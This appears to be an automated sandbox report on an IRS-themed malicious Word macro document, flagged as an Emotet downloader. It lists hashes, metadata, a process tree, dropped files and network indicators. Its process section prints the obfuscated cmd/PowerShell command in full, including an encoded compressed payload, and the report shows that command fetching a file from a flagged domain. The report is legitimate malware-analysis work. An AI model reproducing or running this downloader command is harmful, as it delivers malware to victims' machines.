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File name:

IRS_8043329_11062018.doc

Full analysis: https://app.any.run/tasks/af75e558-7e46-4cf1-b11d-6d33c759cccc
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 14:41:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Alexandra-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 6 11:56:00 2018, Last Saved Time/Date: Tue Nov 6 11:56:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

77EB5D508D06E8B95A98CEB570AA7F8F

SHA1:

A82CA3E0A9C906F3973EADB41F86D1AC9449F4DE

SHA256:

AA658CF9A05090D916E3097D2537BC04252CAB539DD72D6325F06CED60CFDF65

SSDEEP:

768:2eWVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o93jIoF18J8I:2eWocn1kp59gxBK85fBt+a952

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  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3360)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3360)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 3192)
    • Executes application which crashes

      • powershell.exe (PID: 1812)
    • Creates files in the user directory

      • powershell.exe (PID: 1812)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3360)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Alexandra-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:06 11:56:00
ModifyDate: 2018:11:06 11:56:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
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Total processes
38
Monitored processes
6
Malicious processes
1
Suspicious processes
1

Behavior graph

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start winword.exe no specs cmd.exe no specs powershell.exe ntvdm.exe no specs PhotoViewer.dll no specs PhotoViewer.dll no specs

Process information

PID
CMD
Path
Indicators
Parent process
3360"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IRS_8043329_11062018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3192CMD C:\WIndOws\SYStem32\Cmd /c "sET qOuG= .( $SHEllId[1]+$ShelliD[13]+'X') ( neW-ObjECt sYStem.Io.StrEAmReaDER( ( neW-ObjECt IO.comPreSSION.DeflatestReaM([io.meMOrYstReam] [SYstEM.converT]::FRomBase64STrInG( 'PdBRa8IwEMDxr5KHQJSuKe5hD4aC0+FwsDEmug32co3nUm2TmqStVvrdrWXu9f7HD+6osk2ssQ5NskPpyRt6/onJLEtRe0FXz6uYKe+LcRTVdc0dmlGOx1QaLk0eje6rj9nkryflBgp0PszBuQYax1UZvc6/bh0yVToHqZYK7K+CXthN19Pl9z9hT6DrzkDb18MteMhBh6ChAG7LyK4ZXxZZ6gdswoaCNtsDiQl7GDFB31/mMUVdjT3mRcB+WHDNAeN4RCa2xiJINaAqfySpJtcLh2dvT2fafYI/mVpnBjbzNMN+545cwaFY6MrsMVx0aD8RSefsRSvBS3Vu2ws='), [Io.COmPRESSIOn.COmPRessIoNmODE]::dECOMPRESs ) ), [text.EncodINg]::aSCii) ).rEaDTOend()&& POWERShELl ^&('Sv' ) (\"AN\" + \"xh\") ( [TypE](\"{1}{2}{0}\" -f 'nt','enVirONm','e' ) ) ; . ( ([strING]${vE`Rb`OsePRe`FErenCE} )[1,3] + 'x'-jOin'')( ( ( .( \"{0}{1}{2}\"-f 'g','et-vAri','aBlE' ) (\"aN\"+ \"XH\" ) ).\"V`ALUE\"::( \"{2}{0}{1}{4}{3}{6}{5}\" -f 'v','IRO','GeTEN','NTVar','Nme','E','iabL' ).Invoke(( \"{1}{0}\"-f'g','QoU'),( \"{1}{0}{2}\"-f 'Roce','P','sS') ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1812POWERShELl &('Sv' ) (\"AN\" + \"xh\") ( [TypE](\"{1}{2}{0}\" -f 'nt','enVirONm','e' ) ) ; . ( ([strING]${vE`Rb`OsePRe`FErenCE} )[1,3] + 'x'-jOin'')( ( ( .( \"{0}{1}{2}\"-f 'g','et-vAri','aBlE' ) (\"aN\"+ \"XH\" ) ).\"V`ALUE\"::( \"{2}{0}{1}{4}{3}{6}{5}\" -f 'v','IRO','GeTEN','NTVar','Nme','E','iabL' ).Invoke(( \"{1}{0}\"-f'g','QoU'),( \"{1}{0}{2}\"-f 'Roce','P','sS') ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2212"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
255
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
572C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3208C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 701
Read events
1 297
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9BCE.tmp.cvr
MD5:
SHA256:
1812powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5M8MTVZ73QBOZQWVKDQ2.temp
MD5:
SHA256:
2212ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsAF66.tmp
MD5:
SHA256:
2212ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsAF76.tmp
MD5:
SHA256:
3360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:256A3EF47ED32A3D3038855D49DF0319
SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0
1812powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da757.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1812powershell.exeC:\Users\admin\AppData\Local\Temp\61.exehtml
MD5:7ACFE81F71E166364C90BFE156250DA6
SHA256:07F99E34DE6B4F4707F502D1CFCF2957B330C5FF713CF377D1EB82B85F975539
1812powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$S_8043329_11062018.docpgc
MD5:58665EBA26FC9B95F3690005FECAFAE5
SHA256:FA04AE539A169E115FCC1BABDC2C7441D5DC153EE47E70BE4F46E436C4AF9658
3360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
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HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1812
powershell.exe
GET
200
143.95.32.250:80
http://www.seo1mexico.com/cgi-sys/suspendedpage.cgi
US
html
3.55 Kb
malicious
1812
powershell.exe
GET
302
143.95.32.250:80
http://www.seo1mexico.com/12vRC
US
html
235 b
malicious
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Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1812
powershell.exe
143.95.32.250:80
www.seo1mexico.com
Colo4, LLC
US
malicious

DNS requests

Domain
IP
Reputation
www.seo1mexico.com
  • 143.95.32.250
malicious

Threats

PID
Process
Class
Message
1812
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info